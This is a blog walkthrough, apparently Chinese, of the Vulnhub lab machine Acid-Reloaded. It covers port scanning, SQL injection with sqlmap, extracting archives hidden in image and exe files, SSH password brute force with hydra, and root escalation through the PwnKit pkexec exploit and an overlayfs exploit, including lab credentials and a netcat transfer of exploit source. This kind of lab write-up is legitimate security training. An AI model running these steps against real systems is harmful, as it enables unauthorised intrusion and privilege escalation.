[Vulnhub] Acid-Reloaded SQLI+图片数据隐写提取+Pkexec权限提升+O…

2024-07-30 209 0

信息收集

IP Address Opening Ports
192.168.101.158 TCP:22,33447

$ nmap -p- 192.168.101.158 --min-rate 1000 -sC -sV

Not shown: 65534 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 6.7p1 Ubuntu 5ubuntu1.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   1024 cb:47:92:da:ea:b8:d3:82:16:22:0d:a5:5f:05:47:51 (DSA)
|   2048 fd:93:9d:28:57:fb:ef:e0:8e:f1:93:66:03:67:35:50 (RSA)
|   256 a0:a6:52:fb:2c:32:b7:08:b4:ed:61:1d:2d:fa:c8:58 (ECDSA)
|_  256 85:5b:0b:e1:b0:ad:6a:d3:9e:8f:da:38:e5:bd:69:2f (ED25519)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

本地权限

$ ssh [email protected]

[Vulnhub] Acid-Reloaded SQLI+图片数据隐写提取+Pkexec权限提升+O…插图

[Vulnhub] Acid-Reloaded SQLI+图片数据隐写提取+Pkexec权限提升+O…插图1

http://192.168.101.158:33447/

[Vulnhub] Acid-Reloaded SQLI+图片数据隐写提取+Pkexec权限提升+O…插图2

$ dirb http://192.168.101.158:33447/

[Vulnhub] Acid-Reloaded SQLI+图片数据隐写提取+Pkexec权限提升+O…插图3

http://192.168.101.158:33447/bin/index.php

[Vulnhub] Acid-Reloaded SQLI+图片数据隐写提取+Pkexec权限提升+O…插图4

$ gobuster dir -u "http://192.168.101.158:33447/bin" -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-big.txt -x .php

[Vulnhub] Acid-Reloaded SQLI+图片数据隐写提取+Pkexec权限提升+O…插图5

http://192.168.101.158:33447/bin/dashboard.php

[Vulnhub] Acid-Reloaded SQLI+图片数据隐写提取+Pkexec权限提升+O…插图6

Referer : http://192.168.101.158:33447/bin/includes/validation.php

[Vulnhub] Acid-Reloaded SQLI+图片数据隐写提取+Pkexec权限提升+O…插图7

[Vulnhub] Acid-Reloaded SQLI+图片数据隐写提取+Pkexec权限提升+O…插图8

点击后来到页面

[Vulnhub] Acid-Reloaded SQLI+图片数据隐写提取+Pkexec权限提升+O…插图9

$ arjun -u http://192.168.101.158:33447/bin/l33t_haxor.php

[Vulnhub] Acid-Reloaded SQLI+图片数据隐写提取+Pkexec权限提升+O…插图10

http://192.168.101.158:33447/bin/l33t_haxor.php?id=1

[Vulnhub] Acid-Reloaded SQLI+图片数据隐写提取+Pkexec权限提升+O…插图11

$ sqlmap -u "http://192.168.101.158:33447/bin/l33t_haxor.php?id=1" --dbs --tamper=space2comment --batch

[Vulnhub] Acid-Reloaded SQLI+图片数据隐写提取+Pkexec权限提升+O…插图12

$ sqlmap -u "http://192.168.101.158:33447/bin/l33t_haxor.php?id=1" -D secure_login --tables --tamper=space2comment --batch

[Vulnhub] Acid-Reloaded SQLI+图片数据隐写提取+Pkexec权限提升+O…插图13

http://192.168.101.158:33447/UB3R/strcpy.exe

$ binwalk strcpy.exe

[Vulnhub] Acid-Reloaded SQLI+图片数据隐写提取+Pkexec权限提升+O…插图14

$ foremost strcpy.exe

foremost 是一个数据恢复工具,用于从设备、文件系统、或文件中恢复被删除的文件。它是一个命令行工具,最初是由美国空军计算机取证实验室开发的,用于从磁盘图像中恢复文件。foremost 通过识别文件头(headers)、文件中间的数据块和文件尾(footers)来实现文件恢复。

$ cd output

$ cat audit.txt

[Vulnhub] Acid-Reloaded SQLI+图片数据隐写提取+Pkexec权限提升+O…插图15

$ cd rar

$ unrar x 00000213.rar

[Vulnhub] Acid-Reloaded SQLI+图片数据隐写提取+Pkexec权限提升+O…插图16

$ cat acid.txt

[Vulnhub] Acid-Reloaded SQLI+图片数据隐写提取+Pkexec权限提升+O…插图17

$ binwalk lol.jpg

检测到包含RAR数据

[Vulnhub] Acid-Reloaded SQLI+图片数据隐写提取+Pkexec权限提升+O…插图18

$ unrar e lol.jpg

[Vulnhub] Acid-Reloaded SQLI+图片数据隐写提取+Pkexec权限提升+O…插图19

$ cat hint.txt
$ cat Avinash.contact

[Vulnhub] Acid-Reloaded SQLI+图片数据隐写提取+Pkexec权限提升+O…插图20

AQAAABIAAABOAG8AbwBCAEAAMQAyADMAAAA=

$ echo 'AQAAABIAAABOAG8AbwBCAEAAMQAyADMAAAA='|base64 -d

[Vulnhub] Acid-Reloaded SQLI+图片数据隐写提取+Pkexec权限提升+O…插图21

password:NooB@123

$ hydra -L /usr/share/wordlists/rockyou.txt -p 'NooB@123' ssh://192.168.101.158 -t 24

[Vulnhub] Acid-Reloaded SQLI+图片数据隐写提取+Pkexec权限提升+O…插图22

username:makke
password:NooB@123

[Vulnhub] Acid-Reloaded SQLI+图片数据隐写提取+Pkexec权限提升+O…插图23

权限提升

Pkexec

makke@acid:~$ find / -perm -4000 -type f 2>null

[Vulnhub] Acid-Reloaded SQLI+图片数据隐写提取+Pkexec权限提升+O…插图24

makke@acid:/tmp$ nc -lvnp 10033 >PwnKit.c

makke@acid:/tmp$ gcc -shared PwnKit.c -o PwnKit -Wl,-e,entry -fPIC

makke@acid:/tmp$ ./PwnKit

[Vulnhub] Acid-Reloaded SQLI+图片数据隐写提取+Pkexec权限提升+O…插图25

Overlayfs

makke@acid:/etc$ cd /bin
makke@acid:/bin$ ./overlayfs

[Vulnhub] Acid-Reloaded SQLI+图片数据隐写提取+Pkexec权限提升+O…插图26

OverlayFS 的工作原理

  • OverlayFS 通过将一个文件系统(称为 lower layer)叠加到另一个文件系统(称为 upper layer)上来创建一个联合视图。它的工作原理如下:

  • Upper Layer: 这是一个可写的文件系统,通常是一个临时的层(如 RAM 磁盘),用于存储修改和新增的文件。

  • Lower Layer: 这是一个只读的文件系统,通常包含基础系统文件或软件包。

  • Merged View: 用户访问的是两个层的联合视图,所有的文件和目录看起来好像在一个单一的文件系统中。

Flag

# cat /root/.flag.txt

[Vulnhub] Acid-Reloaded SQLI+图片数据隐写提取+Pkexec权限提升+O…插图27

Black@Current@Ice-Cream


4A评测 - 免责申明

本站提供的一切软件、教程和内容信息仅限用于学习和研究目的。

不得将上述内容用于商业或者非法用途,否则一切后果请用户自负。

本站信息来自网络,版权争议与本站无关。您必须在下载后的24个小时之内,从您的电脑或手机中彻底删除上述内容。

如果您喜欢该程序,请支持正版,购买注册,得到更好的正版服务。如有侵权请邮件与我们联系处理。敬请谅解!

程序来源网络,不确保不包含木马病毒等危险内容,请在确保安全的情况下或使用虚拟机使用。

侵权违规投诉邮箱:4ablog168#gmail.com(#换成@)

相关文章

webpack打包站点,js文件名批量获取思路
加密对抗靶场enctypt——labs通关
【论文速读】| 注意力是实现基于大语言模型的代码漏洞定位的关键
蓝队技术——Sysmon识别检测宏病毒
内网渗透学习|powershell上线cs
LLM attack中的API调用安全问题及靶场实践

发布评论